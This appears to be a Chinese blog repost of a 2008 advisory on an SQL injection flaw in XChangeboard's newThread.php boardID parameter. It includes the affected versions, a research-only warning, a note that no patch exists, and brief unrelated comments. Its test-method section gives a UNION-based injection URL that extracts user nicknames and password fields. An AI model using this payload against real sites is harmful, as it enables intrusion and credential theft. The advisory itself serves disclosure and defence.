XChangeboard newThread.php文件SQL注入漏洞 | Art Hacker

XChangeboard newThread.php文件SQL注入漏洞

Posted by Hacker on 07月 7, 2008

受影响系统：
Henrik Brinkmann XChangeboard 1.75 Beta
Henrik Brinkmann XChangeboard 1.70
描述：
BUGTRAQ ID: 30059
Xchangeboard是基于PHP和MySQL的公告牌解决方案。
Xchangeboard的newThread.php文件中没有正确地验证对boardID参数的输入便在SQL查询中使用，这允许远程攻击者通过提交恶意的查询请求执行SQL注入攻击。
<*来源：haZl0oh

链接：http://secunia.com/advisories/30919/
*>
测试方法：
——————————————————————————–
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://site.com/path/newThread.php?boardID=+999999%20union%20ct%20email,concat_ws(0×3a,nick,substring(password,1,100)),email,email,email%20%20user/*
建议：
——————————————————————————–
厂商补丁：
Henrik Brinkmann
—————-
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.xchangeboard.de/

Related Posts Preference

2008-06-23 -- SQL注入攻击的种类和防范手段 (0)
2008-06-23 -- TYPO3多个扩展跨站脚本及SQL注入漏洞 (0)
2008-07-29 -- RealPlayer SWF文件处理堆溢出漏洞 (0)
2008-07-29 -- RealPlayer控件Import方式栈溢出漏洞 (0)
2008-07-28 -- Drupal会话固定漏洞 (0)
2008-07-25 -- 游戏霹雳小组4多个远程拒绝服务漏洞 (0)
2008-07-23 -- CGI::Session CGISESSID Cookie值目录遍历漏洞 (0)
2008-07-23 -- Velocity安全管理系统HTTP服务器目录遍历漏洞 (0)
2008-07-23 -- Citrix XenServer XenAPI HTTP接口跨站脚本漏洞 (0)
2008-07-20 -- WordPress Theme - Firebug (0)

Category: Notice loopholes

2 Responses to “XChangeboard newThread.php文件SQL注入漏洞”

Aasipoie
08月 23rd, 2008 at 5:54 am
Prevetik vsem kto ne spit

Ja tuta nakladu a vi uberite pliz

[Reply]
Hacker Reply:
08月 23rd, 2008 at 8:29 am
I do not know that you mean the message

[Reply]

Leave a Reply